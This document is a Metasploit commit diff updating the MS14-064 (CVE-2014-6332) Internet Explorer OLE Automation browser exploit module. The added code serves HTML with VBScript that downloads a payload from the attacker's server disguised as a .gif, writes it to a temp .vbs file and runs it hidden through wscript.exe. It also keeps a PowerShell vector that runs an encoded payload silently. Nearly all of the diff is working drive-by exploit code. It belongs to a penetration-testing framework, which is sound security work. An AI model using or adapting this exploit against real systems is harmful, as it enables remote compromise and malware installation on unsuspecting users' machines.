Land rapid7#4831, @wchen-r7's update for MS14-064 exploit

* Support Windows XP with VBScript technique

Author: jvazquez-r7

modules/exploits/windows/browser/ms14_064_ole_code_execution.rb

@@ -11,17 +11,19 @@ class Metasploit4 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Exploit::EXE
   include Msf::Exploit::Powershell
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",
+      'Name'           => "MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",
       'Description'    => %q{
         This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332.
-        The vulnerability affects Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.
-        For this module to be successful, powershell is required on the target machine. On
-        Internet Explorer versions using Protected Mode, the user has to manually allow
-        powershell.exe to execute in order to be compromised.
+        The vulnerability affects Internet Explorer 3.0 until version 11 within Windows 95 up to
+        Windows 10, and there is no patch for Windows XP or older.
+
+        Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other
+        newer Windows systems, the exploit will try using Powershell instead.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -32,6 +34,7 @@ def initialize(info={})
           'Wesley Neelen', # security[at]forsec.nl
           'GradiusX <francescomifsud[at]gmail.com>',
           'b33f', # @FuzzySec
+          'sinn3r'
         ],
       'References'     =>
         [
@@ -46,14 +49,24 @@ def initialize(info={})
       'Platform'       => 'win',
       'Targets'        =>
         [
-          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [
+            'Windows XP',
+            {
+              'os_name' => OperatingSystems::Match::WINDOWS_XP
+            }
+          ],
+          [
+            'Other Windows x86',
+              {
+                'os_name' => OperatingSystems::Match::WINDOWS,
+              }
+          ]
         ],
       'BrowserRequirements' =>
         {
           :source  => /script|headers/i,
           :ua_name => HttpClients::IE,
-          :os_name => /win/i,
-          :arch    => 'x86',
+          :arch    => ARCH_X86,
           :ua_ver  => lambda { |ver| ver.to_i.between?(4, 10) }
         },
       'DefaultOptions' =>
@@ -260,31 +273,73 @@ def vbs_prepare()
 
   end
 
-  def get_html()
+  def vbs_vector(prep)
+    vbs_name = "#{Rex::Text.rand_text_alpha(rand(16)+4)}.vbs"
+    gif_name = "#{Rex::Text.rand_text_alpha(rand(5)+3)}.gif"
+
+    payload_src  = (datastore['SSL'] ? 'https' : 'http')
+    payload_src << '://'
+    payload_src << (datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST'])
+    payload_src << ":#{datastore['SRVPORT']}#{get_module_resource}/#{gif_name}"
 
+    # I tried to use ADODB.Stream to save my downloaded executable, but I was hitting an issue
+    # with it, so I ended up with Scripting.FileSystemObject. Not so bad I guess.
+    %Q|<!doctype html>
+<html>
+<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
+<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
+<body>
+<script language="VBScript">
+function runaaaa()
+On Error Resume Next
+
+set xmlhttp = CreateObject("Microsoft.XMLHTTP")
+xmlhttp.open "GET", "#{payload_src}", False
+xmlhttp.send
+
+Set objFSO=CreateObject("Scripting.FileSystemObject")
+folder = objFSO.GetSpecialFolder(2)
+scriptName = folder + "\\#{vbs_name}"
+Set objFile = objFSO.CreateTextFile(scriptName,True)
+objFile.Write xmlhttp.responseText
+objFile.Close
+
+set shell=createobject("Shell.Application")
+shell.ShellExecute "wscript.exe", scriptName, "", "open", 0
+
+end function
+</script>
+<script language="VBScript">
+#{prep}
+</script>
+</body>
+</html>
+    |
+  end
+
+  def powershell_vector(prep)
     if datastore['TRYUAC']
       tryuac = 'runas'
     else
       tryuac = 'open'
     end
 
+    # Powershell was the first technique demonstrated publicly.
+    # On some Windows setups such as Windows 7 without a service pack, this works quite well.
+    # But other Windows setups you will get a prompt.
     payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
     payl.slice! "powershell.exe "
-    prep = vbs_prepare()
 
-    html = %Q|
-<!doctype html>
+    %Q|<!doctype html>
 <html>
 <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 <body>
 <script language="VBScript">
 function runaaaa()
 On Error Resume Next
-
 set shell=createobject("Shell.Application")
 shell.ShellExecute "powershell.exe", "#{payl}", "", "#{tryuac}", 0
-
 end function
 </script>
 <script language="VBScript">
@@ -293,12 +348,38 @@ def get_html()
 </body>
 </html>
     |
+  end
 
+  def get_html
+    prep = vbs_prepare()
+    case get_target.name
+    when OperatingSystems::Match::WINDOWS_XP
+      return vbs_vector(prep)
+    else
+      return powershell_vector(prep)
+    end
   end
 
   def on_request_exploit(cli, request, target_info)
-    print_status("Requesting: #{request.uri}")
-    send_exploit_html(cli, get_html())
+    case request.uri
+    when /\.gif/
+      if get_target.name =~ OperatingSystems::Match::WINDOWS_XP
+        p = regenerate_payload(cli)
+        data = generate_payload_exe({:code => p.encoded})
+
+        # The default template uses \n, and wscript.exe isn't very happy about that.
+        # It should be \r\n .
+        vbs = Msf::Util::EXE.to_exe_vbs(data).gsub(/\x0a/, "\r\n")
+
+        send_response(cli, vbs)
+      else
+        # The VBS technique is only for Windows XP. So if a non-XP system is requesting it,
+        # something is not right.
+        send_not_found(cli)
+      end
+    else
+      send_exploit_html(cli, get_html)
+    end
   end
 
 end